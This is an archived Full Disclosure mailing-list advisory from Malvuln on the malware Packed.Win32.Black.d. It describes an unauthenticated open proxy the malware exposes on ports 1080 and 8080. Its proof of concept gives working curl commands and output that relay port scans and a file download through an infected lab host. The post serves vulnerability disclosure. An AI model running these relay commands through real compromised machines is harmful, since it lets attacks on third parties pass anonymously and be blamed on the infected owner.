lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 4 May 2021 22:17:35 -0400
From: malvuln <malvuln13@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] Packed.Win32.Black.d / Unauthenticated Open Proxy

Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source:
https://malvuln.com/advisory/3a36d7ab34b3241aa2a9072700e0cb7c.txt
Contact: malvuln13@...il.com
Media: twitter.com/malvuln

Threat: Packed.Win32.Black.d
Vulnerability: Unauthenticated Open Proxy
Description: The malware listens on TCP ports 1080 and 8080 and drops a
hidden executable named "Hacker.com.cn.exe" under Windows dir" that runs
with SYSTEM integrity. Third-party adversaries who can connect to the
infected system can relay requests from the original connection to the
destination and then back to the origination system. Attackers may then be
able to launch attacks, download files or port scan third party systems and
it will appear as the attacks originated from that infected host. The relay
does not require authentication or any special User-agent check and
leverages the HTTP Host header in the request to connect to third-party
systems.
Type: PE32
MD5: 3a36d7ab34b3241aa2a9072700e0cb7c
Vuln ID: MVID-2021-0201
Dropped files:
Disclosure: 05/04/2021

Exploit/PoC:
Port scan FTP 21)

curl http://192.168.88.127:8080 -H "Host: 192.168.88.129:21" -v
Rebuilt URL to: http://192.168.88.127:8080/
Trying 192.168.88.127...
TCP_NODELAY set
Connected to 192.168.88.127 (192.168.88.127) port 8080 (#0)
GET / HTTP/1.1
Host: 192.168.88.129:21
User-Agent: curl/7.55.1
Accept: */*

220 INetSim FTP Service ready.
500 Unknown command.

Port scan POP3 port 110)

curl http://192.168.88.127:8080 -H "Host: 192.168.88.129:110" -v
Rebuilt URL to: http://192.168.88.127:8080/
Trying 192.168.88.127...
TCP_NODELAY set
Connected to 192.168.88.127 (192.168.88.127) port 8080 (#0)
GET / HTTP/1.1
Host: 192.168.88.129:110
User-Agent: curl/7.55.1
Accept: */*

+OK INetSim POP3 Server ready <5073.1619409936@...3host>
-ERR Unknown command.

Download files)

curl http://192.168.88.127:8080/DOOM.exe -H "Host: 192.168.88.129" -v
--output DOOM.exe
Trying 192.168.88.127...
TCP_NODELAY set
% Total    % Received % Xferd  Average Speed   Time    Time     Time
 Current
Dload  Upload   Total   Spent    Left  Speed
0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--
0* Connected to 192.168.88.127 (192.168.88.127) port 8080 (#0)
GET /DOOM.exe HTTP/1.1
Host: 192.168.88.129
User-Agent: curl/7.55.1
Accept: */*

HTTP 1.0, assume close after body
HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/2.7.6
Date: Mon, 26 Apr 2021 04:09:39 GMT
Content-type: application/x-msdos-program
Content-Length: 103533
Last-Modified: Sat, 03 Aug 2019 04:57:12 GMT

{ [78487 bytes data]
 75  101k   75 78487    0     0  78487      0  0:00:01  0:00:01 --:--:--
72807* transfer closed with 25046 bytes remaining to read
 75  101k   75 78487    0     0  78487      0  0:00:01  0:00:01 --:--:--
69766
* Closing connection 0


Disclaimer: The information contained within this advisory is supplied
"as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained herein and accepts no responsibility for any damage caused by the
use or misuse of this information. The author prohibits any malicious use
of security related information or exploits by the author or elsewhere. Do
not attempt to download Malware samples. The author of this website takes
no responsibility for any kind of damages occurring from improper Malware
handling or the downloading of ANY Malware mentioned on this website or
elsewhere. All content Copyright (c) Malvuln.com (TM).

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ